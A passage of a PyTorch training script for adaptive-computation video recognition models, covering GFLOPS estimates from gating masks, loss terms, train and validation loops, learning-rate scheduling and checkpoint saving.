range(len(gflops_list))])\n savings = savings0 + savings1\n else:\n savings = sum([s0[i] * gflops_list[i][0] * (1 - 1.0 / args.partitions) for i in range(len(gflops_list))])\n real_gflops = base_model_gflops - savings / 1e9\n upperbound_gflops = real_gflops\n\n return upperbound_gflops, real_gflops\n\n\ndef print_mask_statistics(mask_tensor_list, args):\n if \"cgnet\" in args.arch:\n cnt_ = [torch.sum(x, dim=[0, 1]) for x in mask_tensor_list] # sum up over t\n cnt_out = sum([x[0] for x in cnt_])\n cnt_full = sum([x[1] for x in cnt_])\n print(\"Overall sparsity: %.4f\"%(1-1.0*cnt_full/cnt_out))\n print(\"Full: \", \" \".join([\"%7.4f\" % (1.0*x[1]/1e9) for x in cnt_]))\n print(\"Total: \", \" \".join([\"%7.4f\" % (1.0*x[0]/1e9) for x in cnt_]))\n print(\"Ratio: \", \" \".join([\"%7.4f\" % (1-1.0*x[1]/x[0]) for x in cnt_]))\n print()\n else:\n # overall\n # t=overall, 0, mid, end\n # 1. sparsity (layerwise)\n # 2. 
variance (layerwise)\n if args.gate_history:\n if args.gate_no_skipping:\n dim_str = [\"hist\", \"curr\"]\n else:\n dim_str = [\"save\", \"hist\", \"curr\"]\n else:\n dim_str = [\"save\", \"curr\"]\n\n print(\"Overall:\")\n\n normalized_tensor_list=[]\n for mask in mask_tensor_list:\n normalized_tensor_list.append(f.normalize(mask, dim=-1, p=1))\n\n for t_i in [None]: #[None, num_segments // 2]: # \"[None, 0, num_segments // 2, num_segments - 1]:\n t_start = t_i if t_i is not None else 0\n t_end = t_i + 1 if t_i is not None else mask_tensor_list[0].shape[0]\n for dim_i in range(len(dim_str)):\n s_list = []\n\n layer_i_list = [iii for iii in range(len(mask_tensor_list))]\n cap_length = args.cap_length\n if len(mask_tensor_list) > cap_length:\n layer_i_list = [int(iii) for iii in np.linspace(0, len(mask_tensor_list)-1, cap_length, endpoint=True)]\n\n for layer_i in layer_i_list:\n s_list.append(torch.mean(normalized_tensor_list[layer_i][t_start:t_end, :, dim_i]))\n # d_list.append(\n # torch.std(torch.mean(mask_tensor_list[layer_i][t_start:t_end, :, dim_i], dim=-1), unbiased=True))\n # TODO channel-wise fire percentage for instances\n # TODO this can be a channel percentage histogram, ranged from 0~1, where we only count five buckets\n # TODO (0.00~0.20) (0.20~0.40) (0.40~0.60) (0.60~0.80) (0.80~1.00)\n # percentage = torch.mean(mask_tensor_list[layer_i][t_start:t_end, :, dim_i], dim=[0])\n # p_list.append(torch.histc(percentage, bins=5, min=0, max=1) / percentage.shape[0])\n t = \"%3d\" % t_i if t_i is not None else \"all\"\n print(\"(t=%s, %s)usage: \" % (t, dim_str[dim_i]),\n \" \".join([\"%.4f \" % (s) for s in s_list]))\n # print(\" \",\n # \" \".join([\"(\" + (\",\".join([\"%02d\" % (min(99, x * 100)) for x in p])) + \")\" for p in p_list]))\n print()\n\n # if args.dense_in_block:\n # stat_skip0 = 0\n # stat_reuse0 = 0\n # stat_keep0 = 0\n # stat_skip1 = 0\n # stat_reuse1 = 0\n # stat_keep1 = 0\n # for layer_i, mask in enumerate(mask_tensor_list):\n # if layer_i % 2 == 0:\n # if not args.gate_no_skipping:\n # stat_skip0 += torch.sum(mask[:, :, :, 0]).item()\n # if args.gate_history:\n # stat_reuse0 += torch.sum(mask[:, :, :, -2]).item()\n # stat_keep0 += torch.sum(mask[:, :, :, -1]).item()\n # else:\n # if not args.gate_no_skipping:\n # stat_skip1 += torch.sum(mask[:, :, :, 0]).item()\n # if args.gate_history:\n # stat_reuse1 += torch.sum(mask[:, :, :, -2]).item()\n # stat_keep1 += torch.sum(mask[:, :, :, -1]).item()\n # stat_total0 = stat_skip0 + stat_reuse0 + stat_keep0\n # stat_total1 = stat_skip1 + stat_reuse1 + stat_keep1\n # print(\"(=0)\\nskip : %.4f reuse: %.4f keep : %.4f\"\n # % (stat_skip0 / stat_total0, stat_reuse0 / stat_total0, stat_keep0 / stat_total0))\n #\n # print(\"(=1)\\nskip : %.4f reuse: %.4f keep : %.4f\"\n # % (stat_skip1 / stat_total1, stat_reuse1 / stat_total1, stat_keep1 / stat_total1))\n\n # stat_skip = 0\n # stat_reuse = 0\n # stat_keep = 0\n # for mask in mask_tensor_list:\n # if not args.gate_no_skipping:\n # stat_skip += torch.sum(mask[:, :, 0]).item()\n # if args.gate_history:\n # stat_reuse += torch.sum(mask[:, :, -2]).item()\n # stat_keep += torch.sum(mask[:, :, -1]).item()\n #\n # stat_total = stat_skip + stat_reuse + stat_keep\n\n stat_skip, stat_reuse, stat_keep, stat_total = get_mask_usage(mask_tensor_list, args)\n\n print(\"(overall)\\nskip : %.4f reuse: %.4f keep : %.4f\\n\"\n % (stat_skip/stat_total, stat_reuse/stat_total, stat_keep/stat_total))\n\n\n\ndef reverse_onehot(a):\n try:\n return np.array([np.where(r > 0.5)[0][0] for r in a])\n 
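# e.g. reverse_onehot(np.eye(3)) -> array([0, 1, 2]); rows are assumed one-hot with their peak above 0.5\n 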
except Exception as e:\n print(\"error stack:\", e)\n print(a)\n for i, r in enumerate(a):\n print(i, r)\n return None\n\ndef get_mask_usage(mask_tensor_list, args):\n stat_skip = 0\n stat_reuse = 0\n stat_keep = 0\n for mask in mask_tensor_list:\n if not args.gate_no_skipping:\n stat_skip += torch.sum(mask[:, :, 0])\n if args.gate_history:\n stat_reuse += torch.sum(mask[:, :, -2])\n stat_keep += torch.sum(mask[:, :, -1])\n\n stat_total = stat_skip + stat_reuse + stat_keep\n return stat_skip, stat_reuse, stat_keep, stat_total\n\ndef compute_epic_losses(criterion, prediction, target, a_v_m, a_n_m):\n v_pred = get_marginal_output(prediction, a_v_m, 125)\n n_pred = get_marginal_output(prediction, a_n_m, 352)\n v_acc_loss = criterion(v_pred, target[:, 1])\n n_acc_loss = criterion(n_pred, target[:, 2])\n acc_loss = v_acc_loss + n_acc_loss\n return v_acc_loss, n_acc_loss, acc_loss\n\ndef compute_losses(criterion, prediction, target, mask_stack_list, upb_gflops_tensor, real_gflops_tensor, epoch_i, model,\n a_v_m, a_n_m, base_model_gflops, args):\n loss_dict={}\n if args.gflops_loss_type == \"real\":\n gflops_tensor = real_gflops_tensor\n else:\n gflops_tensor = upb_gflops_tensor\n\n # linear efficiency loss scheduling\n if args.gate_linear_phase > 0:\n factor = 1. / args.gate_linear_phase * min(args.gate_linear_phase, epoch_i)\n else:\n factor = 1.\n\n if epoch_i < args.gate_loss_starts_from:\n factor = 0.\n\n # accuracy loss\n if args.dataset == \"epic\": # combined_verb/noun_losses\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, prediction, target, a_v_m, a_n_m)\n loss_dict[\"verb_loss\"] = v_acc_loss\n loss_dict[\"noun_loss\"] = n_acc_loss\n else:\n acc_loss = criterion(prediction, target[:, 0])\n loss_dict[\"acc_loss\"] = acc_loss\n\n loss_dict[\"eff_loss\"] = acc_loss * 0\n # gflops loss\n gflops_loss = acc_loss * 0\n if args.gate_gflops_loss_weight > 0 and epoch_i > args.eff_loss_after:\n if args.gflops_loss_norm == 1:\n gflops_loss = torch.abs(gflops_tensor - args.gate_gflops_bias) * args.gate_gflops_loss_weight * factor\n elif args.gflops_loss_norm == 2:\n gflops_loss = ((gflops_tensor/base_model_gflops - args.gate_gflops_threshold)**2) * args.gate_gflops_loss_weight * factor\n loss_dict[\"gflops_loss\"] = gflops_loss\n loss_dict[\"eff_loss\"] += gflops_loss\n\n # regularizer loss\n regu_loss = acc_loss * 0\n if args.keep_weight > 0 or args.reuse_weight>0 or args.skip_weight>0:\n stat_skip, stat_reuse, stat_keep, stat_total = get_mask_usage(mask_stack_list, args)\n regu_loss += args.skip_weight * (((stat_skip / stat_total - args.skip_ratio) / args.skip_ratio) ** 2)\n regu_loss += args.reuse_weight * (((stat_reuse / stat_total - args.reuse_ratio) / args.reuse_ratio) ** 2)\n regu_loss += args.keep_weight * (((stat_keep / stat_total - args.keep_ratio) / args.keep_ratio) ** 2)\n loss_dict[\"regu_loss\"] = regu_loss\n loss_dict[\"eff_loss\"] += regu_loss\n\n # threshold loss for cgnet\n thres_loss = acc_loss * 0\n if \"cgnet\" in args.arch:\n for name, param in model.named_parameters():\n if 'threshold' in name:\n # print(param)\n thres_loss += args.threshold_loss_weight * torch.sum((param-args.gtarget) ** 2)\n loss_dict[\"thres_loss\"] = thres_loss\n loss_dict[\"eff_loss\"] += thres_loss\n loss = acc_loss + gflops_loss + thres_loss\n loss_dict[\"loss\"] = loss\n\n return loss_dict\n # if args.dataset == \"epic\":\n # return {\n # \"loss\": loss,\n # \"verb_loss\": v_acc_loss,\n # \"noun_loss\": n_acc_loss,\n # \"eff_loss\": loss - acc_loss,\n # \"regu_loss\": loss - 
acc_loss,\n # \"gflops_loss\": gflops_loss,\n # \"thres_loss\": thres_loss,\n # }\n #\n # else:\n # return {\n # \"loss\": loss,\n # \"acc_loss\": acc_loss,\n # \"eff_loss\": loss - acc_loss,\n # \"gflops_loss\": gflops_loss,\n # \"thres_loss\": thres_loss,\n # }\n\ndef elastic_list_print(l, limit=8):\n if isinstance(l, str):\n return l\n limit = min(limit, len(l))\n l_output = \"[%s,\" % (\",\".join([str(x) for x in l[:limit // 2]]))\n if l.shape[0] > limit:\n l_output += \"...\"\n l_output += \"%s]\" % (\",\".join([str(x) for x in l[-limit // 2:]]))\n return l_output\n\n\ndef compute_exp_decay_tau(epoch, args):\n return args.init_tau * np.exp(args.exp_decay_factor * epoch)\n\n\ndef get_policy_usage_str(upb_gflops, real_gflops):\n return \"Equivalent GFLOPS: upb: %.4f real: %.4f\" % (upb_gflops.item(), real_gflops.item())\n\n\ndef get_current_temperature(num_epoch, args):\n if args.exp_decay:\n tau = compute_exp_decay_tau(num_epoch, args)\n else:\n tau = args.init_tau\n return tau\n\n\ndef get_recorders(number):\n return [Recorder() for _ in range(number)]\n\n\ndef get_average_meters(number):\n return [AverageMeter() for _ in range(number)]\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, base_model_gflops, gflops_list, g_meta, args, tf_writer):\n batch_time, data_time, top1, top5 = get_average_meters(4)\n if args.dataset==\"epic\":\n verb_top1, verb_top5, noun_top1, noun_top5 = get_average_meters(4)\n losses_dict = {}\n if args.ada_reso_skip:\n\n if \"batenet\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0 for\n _ in\n gflops_list]\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0\n for\n _ in\n gflops_list]\n else:\n mask_stack_list_list = [[] for _ in gflops_list] + [[] for _ in gflops_list] if args.dense_in_block else [[] for _ in gflops_list]\n upb_batch_gflops_list=[]\n real_batch_gflops_list=[]\n\n tau = get_current_temperature(epoch, args)\n\n # switch to train mode\n model.module.partialBN(not args.no_partialbn)\n model.train()\n\n end = time.time()\n if args.rank==0:\n print(\"#%s# lr:%.6f\\ttau:%.4f\" % (args.exp_header, optimizer.param_groups[-1]['lr'] * 0.1, tau))\n\n if dist.is_initialized():\n train_loader.sampler.set_epoch(epoch)\n\n for i, input_tuple in enumerate(train_loader):\n data_time.update(time.time() - end)\n if args.warmup_epochs > 0:\n adjust_learning_rate(optimizer, epoch, len(train_loader), i, \"linear\", None, args)\n\n # input and target\n batchsize = input_tuple[0].size(0)\n # if args.gpus is not None:\n # input_var_list = [torch.autograd.Variable(input_item).cuda(args.gpus, non_blocking=True) for input_item in input_tuple[:-1]]\n # target = input_tuple[-1].cuda(args.gpus, non_blocking=True)\n # else:\n input_var_list = [torch.autograd.Variable(input_item).cuda(non_blocking=True) for input_item in\n input_tuple[:-1]]\n target = input_tuple[-1].cuda(non_blocking=True)\n\n target_var = torch.autograd.Variable(target)\n\n # model forward function & measure losses and accuracy\n output, mask_stack_list, _, _ = \\\n model(input=input_var_list, tau=tau, is_training=True, curr_step=epoch * len(train_loader) + i)\n\n if args.ada_reso_skip:\n # for m_i in range(len(mask_stack_list)):\n # mask_stack_list[m_i] = torch.sum(mask_stack_list[m_i], dim=0)\n # mask_stack_list[m_i] = f.normalize(mask_stack_list[m_i], dim=-1, p=1)\n upb_gflops_tensor, real_gflops_tensor = 
compute_gflops_by_mask(mask_stack_list, base_model_gflops, gflops_list, g_meta, args)\n loss_dict = compute_losses(criterion, output, target_var, mask_stack_list,\n upb_gflops_tensor, real_gflops_tensor, epoch, model,\n train_loader.a_v_m, train_loader.a_n_m, base_model_gflops, args)\n upb_batch_gflops_list.append(upb_gflops_tensor.detach())\n real_batch_gflops_list.append(real_gflops_tensor.detach())\n else:\n if args.dataset == \"epic\":\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, output, target_var,\n train_loader.a_v_m, train_loader.a_n_m)\n loss_dict = {\"loss\": acc_loss, \"verb_loss\": v_acc_loss, \"noun_loss\": n_acc_loss}\n else:\n loss_dict = {\"loss\": criterion(output, target_var[:, 0])}\n prec1, prec5 = accuracy(output.data, target[:, 0], topk=(1, 5))\n\n if args.dataset == \"epic\":\n verb_prec1, verb_prec5, noun_prec1, noun_prec5 = verb_noun_accuracy(\n train_loader.a_v_m, train_loader.a_n_m, output.data, target, topk=(1, 5))\n\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(prec1)\n dist.all_reduce(prec5)\n prec1 /= world_size\n prec5 /= world_size\n if args.dataset == \"epic\":\n dist.all_reduce(verb_prec1)\n dist.all_reduce(verb_prec5)\n dist.all_reduce(noun_prec1)\n dist.all_reduce(noun_prec5)\n verb_prec1 /= world_size\n verb_prec5 /= world_size\n noun_prec1 /= world_size\n noun_prec5 /= world_size\n\n # record losses and accuracy\n if len(losses_dict)==0:\n losses_dict = {loss_name: get_average_meters(1)[0] for loss_name in loss_dict}\n for loss_name in loss_dict:\n losses_dict[loss_name].update(loss_dict[loss_name].item(), batchsize)\n top1.update(prec1.item(), batchsize)\n top5.update(prec5.item(), batchsize)\n if args.dataset == \"epic\":\n verb_top1.update(verb_prec1.item(), batchsize)\n verb_top5.update(verb_prec5.item(), batchsize)\n noun_top1.update(noun_prec1.item(), batchsize)\n noun_top5.update(noun_prec5.item(), batchsize)\n\n # from torch import autograd\n # with autograd.detect_anomaly():\n # compute gradient and do SGD step\n loss_dict[\"loss\"].backward()\n\n if args.clip_gradient is not None:\n clip_grad_norm_(model.parameters(), args.clip_gradient)\n optimizer.step()\n optimizer.zero_grad()\n\n # gather masks\n if args.ada_reso_skip:\n for layer_i, mask_stack in enumerate(mask_stack_list):\n if \"batenet\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0)\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0)\n else: # TODO CGNet\n mask_stack_list_list[layer_i].append(mask_stack.detach()) #TODO removed cpu()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # logging\n if args.rank==0 and i % args.print_freq == 0:\n print_output = ('Epoch:[{0:02d}][{1:03d}/{2:03d}] lr {3:.6f} '\n 'Time {batch_time.val:.3f}({batch_time.avg:.3f}) '\n '{data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss{loss.val:.4f}({loss.avg:.4f}) '\n 'Prec@1 {top1.val:.3f}({top1.avg:.3f}) '\n 'Prec@5 {top5.val:.3f}({top5.avg:.3f})\\t'.format(\n epoch, i, len(train_loader), optimizer.param_groups[-1]['lr'] * 0.1, batch_time=batch_time,\n data_time=data_time, loss=losses_dict[\"loss\"], top1=top1, top5=top5)) # TODO\n\n if args.dataset==\"epic\":\n print_output += \"V@1({v1.avg:.3f}) ({v5.avg:.3f}) \" \\\n \"N@1({n1.avg:.3f}) ({n5.avg:.3f}) \".\\\n format(v1=verb_top1, v5=verb_top5, n1=noun_top1, n5=noun_top5)\n\n for loss_name in losses_dict:\n if loss_name == \"loss\" or \"mask\" in loss_name:\n 
continue\n print_output += ' {header:s} ({loss.avg:.3f})'.\\\n format(header=loss_name[0], loss=losses_dict[loss_name])\n print(print_output)\n if args.ada_reso_skip:\n if \"cgnet\" in args.arch:\n for layer_i in range(len(mask_stack_list_list)):\n mask_stack_list_list[layer_i] = torch.cat(mask_stack_list_list[layer_i], dim=0)\n # upb_batch_gflops, real_batch_gflops = compute_gflops_by_mask(mask_stack_list_list, base_model_gflops, gflops_list, args)\n upb_batch_gflops= torch.mean(torch.stack(upb_batch_gflops_list))\n real_batch_gflops = torch.mean(torch.stack(real_batch_gflops_list))\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(upb_batch_gflops)\n dist.all_reduce(real_batch_gflops)\n upb_batch_gflops /= world_size\n real_batch_gflops /= world_size\n\n if args.rank == 0:\n if args.ada_reso_skip:\n usage_str = get_policy_usage_str(upb_batch_gflops, real_batch_gflops)\n print(usage_str)\n # if args.print_statistics:\n print_mask_statistics(mask_stack_list_list, args)\n else:\n usage_str = \"Base Model\"\n if tf_writer is not None:\n tf_writer.add_scalar('loss/train', losses_dict[\"loss\"].avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n else:\n usage_str = \"Empty (non-master nodes)\"\n return usage_str\n\n\ndef validate(val_loader, model, criterion, epoch, base_model_gflops, gflops_list, g_meta, exp_full_path, args, tf_writer=None):\n batch_time, top1, top5 = get_average_meters(3)\n if args.dataset==\"epic\":\n verb_top1, verb_top5, noun_top1, noun_top5 = get_average_meters(4)\n # TODO(yue)\n all_results = []\n all_targets = []\n\n if args.save_meta_gate:\n gate_meta_list = []\n mask_stat_list = [[] for _ in gflops_list] # []\n if args.save_meta:\n record_path_list = []\n indices_list = []\n\n tau = get_current_temperature(epoch, args)\n\n if args.ada_reso_skip:\n if \"batenet\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0 for\n _ in\n gflops_list]\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0\n for\n _ in\n gflops_list]\n else:\n mask_stack_list_list = [[] for _ in gflops_list] + [[] for _ in gflops_list] if args.dense_in_block else [[] for _ in gflops_list]\n upb_batch_gflops_list = []\n real_batch_gflops_list = []\n\n losses_dict={}\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for i, input_tuple in enumerate(val_loader):\n # input and target\n batchsize = input_tuple[0].size(0)\n # if args.gpus is not None:\n # input_tuple = [x.cuda(args.gpus, non_blocking=True) for x in input_tuple]\n # else:\n input_data = input_tuple[0].cuda(non_blocking=True)\n # input_tuple = [x.cuda(non_blocking=True) for x in input_tuple]\n target = input_tuple[-1].cuda(non_blocking=True)\n # target = input_tuple[-1].cuda(args.gpus, non_blocking=True)\n if args.save_meta:\n for save_i in range(batchsize):\n record_path_list.append(input_tuple[1][save_i])\n indices_list.append(torch.tensor(input_tuple[2][save_i]))\n\n # model forward function\n output, mask_stack_list, _, gate_meta = \\\n model(input=[input_data], tau=tau, is_training=False, curr_step=0)\n\n # measure losses, accuracy and predictions\n if args.ada_reso_skip:\n upb_gflops_tensor, real_gflops_tensor = compute_gflops_by_mask(mask_stack_list, 
base_model_gflops, gflops_list, g_meta, args)\n loss_dict = compute_losses(criterion, output, target, mask_stack_list,\n upb_gflops_tensor, real_gflops_tensor, epoch, model,\n val_loader.a_v_m, val_loader.a_n_m, base_model_gflops, args)\n upb_batch_gflops_list.append(upb_gflops_tensor)\n real_batch_gflops_list.append(real_gflops_tensor)\n else:\n if args.dataset==\"epic\":\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, output, target,\n val_loader.a_v_m, val_loader.a_n_m)\n loss_dict = {\"loss\": acc_loss, \"verb_loss\": v_acc_loss, \"noun_loss\": n_acc_loss}\n else:\n loss_dict = {\"loss\": criterion(output, target[:, 0])}\n\n prec1, prec5 = accuracy(output.data, target[:, 0], topk=(1, 5))\n\n if args.dataset == \"epic\":\n verb_prec1, verb_prec5, noun_prec1, noun_prec5 = verb_noun_accuracy(\n val_loader.a_v_m, val_loader.a_n_m, output.data, target, topk=(1, 5))\n\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(prec1)\n dist.all_reduce(prec5)\n prec1 /= world_size\n prec5 /= world_size\n if args.dataset == \"epic\":\n dist.all_reduce(verb_prec1)\n dist.all_reduce(verb_prec5)\n dist.all_reduce(noun_prec1)\n dist.all_reduce(noun_prec5)\n verb_prec1 /= world_size\n verb_prec5 /= world_size\n noun_prec1 /= world_size\n noun_prec5 /= world_size\n\n all_results.append(output)\n all_targets.append(target)\n\n # record loss and accuracy\n if len(losses_dict) == 0:\n losses_dict = {loss_name: get_average_meters(1)[0] for loss_name in loss_dict}\n for loss_name in loss_dict:\n losses_dict[loss_name].update(loss_dict[loss_name].item(), batchsize)\n top1.update(prec1.item(), batchsize)\n top5.update(prec5.item(), batchsize)\n if args.dataset == \"epic\":\n verb_top1.update(verb_prec1.item(), batchsize)\n verb_top5.update(verb_prec5.item(), batchsize)\n noun_top1.update(noun_prec1.item(), batchsize)\n noun_top5.update(noun_prec5.item(), batchsize)\n\n if args.ada_reso_skip:\n # gather masks\n for layer_i, mask_stack in enumerate(mask_stack_list):\n if \"batenet\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0) # TODO remvoed .cpu()\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0) # TODO remvoed .cpu()\n else: # TODO CGNet\n mask_stack_list_list[layer_i].append(mask_stack.detach()) #TODO remvoed .cpu()\n\n if args.save_meta_gate:\n gate_meta_list.append(gate_meta.cpu())\n # mask_stat=[]\n # for layer_i, mask_stack in enumerate(mask_stack_list):\n # mask_stat.append(torch.sum(mask_stack.cpu(), dim=2)) # TODO: N*T*C*3 -> N*T*3\n # mask_stat = torch.stack(mask_stat, dim=2) # TODO L, N*T*3->N*T*L*3\n # mask_stat_list.append(mask_stat)\n for layer_i, mask_stack in enumerate(mask_stack_list):\n mask_stat_list[layer_i].append(torch.max(mask_stack.cpu(), dim=-1)[1]) # TODO: L, N*T*C*3\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if args.rank == 0 and i % args.print_freq == 0:\n print_output = ('Test: [{0:03d}/{1:03d}] '\n 'Time {batch_time.val:.3f}({batch_time.avg:.3f})\\t'\n 'Loss{loss.val:.4f}({loss.avg:.4f})'\n 'Prec@1 {top1.val:.3f}({top1.avg:.3f}) '\n 'Prec@5 {top5.val:.3f}({top5.avg:.3f})\\t'.\n format(i, len(val_loader), batch_time=batch_time,\n loss=losses_dict[\"loss\"], top1=top1, top5=top5))\n if args.dataset == \"epic\":\n print_output += \"V@1 {v1.val:.3f}({v1.avg:.3f}) V@5 {v5.val:.3f}({v5.avg:.3f}) \" \\\n \"N@1 {n1.val:.3f}({n1.avg:.3f}) N@5 {n5.val:.3f}({n5.avg:.3f}) \". 
\\\n format(v1=verb_top1, v5=verb_top5, n1=noun_top1, n5=noun_top5)\n\n for loss_name in losses_dict:\n if loss_name == \"loss\" or \"mask\" in loss_name:\n continue\n print_output += ' {header:s} {loss.val:.3f}({loss.avg:.3f})'. \\\n format(header=loss_name[0], loss=losses_dict[loss_name])\n print(print_output)\n if args.ada_reso_skip:\n if \"cgnet\" in args.arch:\n for layer_i in range(len(mask_stack_list_list)):\n mask_stack_list_list[layer_i] = torch.cat(mask_stack_list_list[layer_i], dim=0)\n # upb_batch_gflops, real_batch_gflops = compute_gflops_by_mask(mask_stack_list_list, base_model_gflops, gflops_list, args)\n upb_batch_gflops = torch.mean(torch.stack(upb_batch_gflops_list))\n real_batch_gflops = torch.mean(torch.stack(real_batch_gflops_list))\n\n mAP, _ = cal_map(torch.cat(all_results, 0).cpu(),\n torch.cat(all_targets, 0)[:, 0:1].cpu()) # TODO(yue) single-label mAP\n mmAP, _ = cal_map(torch.cat(all_results, 0).cpu(), torch.cat(all_targets, 0).cpu()) # TODO(yue) multi-label mAP\n\n\n if dist.is_initialized():\n mAP_tensor = torch.tensor(mAP).to(all_results[0].device)\n mmAP_tensor = torch.tensor(mmAP).to(all_results[0].device)\n\n world_size = dist.get_world_size()\n if args.ada_reso_skip:\n dist.all_reduce(upb_batch_gflops)\n dist.all_reduce(real_batch_gflops)\n dist.all_reduce(mAP_tensor)\n dist.all_reduce(mmAP_tensor)\n if args.ada_reso_skip:\n upb_batch_gflops /= world_size\n real_batch_gflops /= world_size\n mAP_tensor /= world_size\n mmAP_tensor /= world_size\n mAP = mAP_tensor.item()\n mmAP = mmAP_tensor.item()\n\n if args.rank==0:\n epic_str=\"\"\n if args.dataset==\"epic\":\n epic_str = \"V@1: %.3f V@5: %.3f N@1: %.3f N@5: %.3f\" % (verb_top1.avg, verb_top5.avg, noun_top1.avg, noun_top5.avg)\n\n print('Testing: mAP {mAP:.3f} mmAP {mmAP:.3f} Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} {epic_str:s} Loss {loss.avg:.5f}'\n .format(mAP=mAP, mmAP=mmAP, top1=top1, top5=top5, loss=losses_dict[\"loss\"],\n epic_str=epic_str))\n if args.ada_reso_skip:\n usage_str = get_policy_usage_str(upb_batch_gflops, real_batch_gflops)\n print(usage_str)\n # if args.print_statistics:\n print_mask_statistics(mask_stack_list_list, args)\n else:\n usage_str = \"Base Model\"\n\n if args.save_meta_gate:\n # TODO all_targets, all_preds, all_mask_stats\n # all_mask_stats = torch.cat(mask_stat_list, dim=0)\n all_preds = torch.cat(gate_meta_list, dim=0)\n\n for layer_i in range(len(mask_stack_list)):\n mask_stat_list[layer_i] = torch.cat(mask_stat_list[layer_i], dim=0) # TODO: L, N*T*C\n mask_stat_list[layer_i] = mask_stat_list[layer_i].numpy().astype(np.uint8)\n # for layer_i in range(len(mask_stack_list)):\n # print(mask_stat_list[layer_i].shape)\n\n # np.savez(\"%s/meta-gate-val.npy\" % (exp_full_path),\n # preds=all_preds.numpy(), targets=torch.cat(all_targets, 0).cpu().numpy(),\n # record_path=torch.cat(record_path_list, 0).cpu().numpy(),\n # indices_list=torch.cat(indices_list, 0).cpu().numpy())\n # else:\n np.savez(\"%s/meta-gate-val.npy\" % (exp_full_path),\n preds=all_preds.numpy(), targets=torch.cat(all_targets, 0).cpu().numpy())\n with open(\"%s/gate-stat-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(mask_stat_list, outfile, pickle.HIGHEST_PROTOCOL)\n if args.save_meta:\n with open(\"%s/record-path-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(record_path_list, outfile, pickle.HIGHEST_PROTOCOL)\n\n with open(\"%s/indices-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(torch.stack(indices_list,0).cpu().numpy(), outfile, pickle.HIGHEST_PROTOCOL)\n\n 
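# nb: np.savez appends '.npz' to string filenames, so the file above lands on disk as 'meta-gate-val.npy.npz'\n 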
if tf_writer is not None:\n tf_writer.add_scalar('loss/test', losses_dict[\"loss\"].avg, epoch)\n tf_writer.add_scalar('acc/test_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/test_top5', top5.avg, epoch)\n else:\n usage_str = \"Empty: non-master node\"\n if args.dataset==\"epic\":\n return mAP, mmAP, top1.avg, top5.avg, usage_str, (verb_top1.avg, verb_top5.avg, noun_top1.avg, noun_top5.avg)\n else:\n return mAP, mmAP, top1.avg, top5.avg, usage_str, None\n\n\ndef save_checkpoint(state, is_best, shall_backup, exp_full_path, decorator):\n if is_best:\n torch.save(state, '%s/models/%s.pth.tar' % (exp_full_path, decorator))\n if shall_backup:\n copyfile(\"%s/models/ckpt.best.pth.tar\"%exp_full_path,\n \"%s/models/oldbest.%s.pth.tar\"%(exp_full_path, decorator))\n\n\ndef adjust_learning_rate(optimizer, epoch, length, iteration, lr_type, lr_steps, args):\n if lr_type == 'step':\n decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))\n lr = args.lr * decay\n decay = args.weight_decay\n elif lr_type == 'cos':\n import math\n lr = 0.5 * args.lr * (1 + math.cos(math.pi * epoch / args.epochs))\n decay = args.weight_decay\n elif lr_type == 'linear':\n factor = min(1.0, (epoch * length + iteration + 1)/(args.warmup_epochs * length))\n lr = args.lr * factor\n else:\n raise NotImplementedError\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * param_group['lr_mult']\n if lr_type != 'linear':\n param_group['weight_decay'] = decay * param_group['decay_mult']\n\n\ndef setup_log_directory(exp_header, test_mode, args, logger):\n exp_full_name = \"g%s_%s\" % (logger._timestr, exp_header)\n if test_mode:\n exp_full_path = ospj(common.EXPS_PATH, args.test_from)\n else:\n exp_full_path = ospj(common.EXPS_PATH, exp_full_name)\n if args.rank == 0:\n os.makedirs(exp_full_path)\n os.makedirs(ospj(exp_full_path, \"models\"))\n if args.rank == 0:\n logger.create_log(exp_full_path, test_mode, args.num_segments, args.batch_size, args.top_k)\n return exp_full_path\n\ndef build_dataflow(dataset, is_train, batch_size, workers, is_distributed, not_pin_memory):\n workers = min(workers, multiprocessing.cpu_count())\n sampler = torch.utils.data.distributed.DistributedSampler(dataset) if is_distributed else None\n shuffle = False\n if is_train:\n shuffle = sampler is None\n\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle,\n num_workers=workers, pin_memory=not not_pin_memory, sampler=sampler,\n drop_last=is_train)\n return data_loader\n\n\ndef get_data_loaders(model, prefix, args):\n if args.rank == 0:\n 